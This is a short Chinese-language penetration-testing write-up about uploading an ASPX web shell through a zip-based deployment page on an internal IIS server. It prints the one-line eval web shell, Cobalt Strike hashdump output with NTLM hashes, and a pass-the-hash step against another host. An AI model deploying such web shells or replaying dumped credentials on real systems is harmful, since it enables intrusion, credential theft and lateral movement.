内网180的.NET拿shell

内网180的.NET拿shell

最近对公司内网进行渗透,发现了一台项目部署的页面,就有了下面的后续。

  1. 打开发现两个服务,一个是iis7.5的默认页面

image

  1. 另一个是项目上传部署的页面

image

  1. 根据直觉告诉我,这里肯定可以上传项目然后getshell
  2. 尝试直接上传之后未成功
  3. 确认为.NET的中间件,尝试上传1.aspx

image

系统提示必须为zip压缩包

image

  1. 添加一个名称为“1”的站点

image

然后将1.aspx压缩成1.zip,最后进行上传

其中1.aspx的内容为

1
<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

7.访问URL:http://192.168.1.180:8081/1/1.aspx

image

8.确认文件是存在的。

不存在的文件的页面如下:

image

image

1
2
3
4
5
6
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d4616051c370c1ae742f4db998fbdae1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:4a1592e183d8b7b58780c2d82ca8d622:::

image

Net view

image

对1.155进行凭证传递

image

image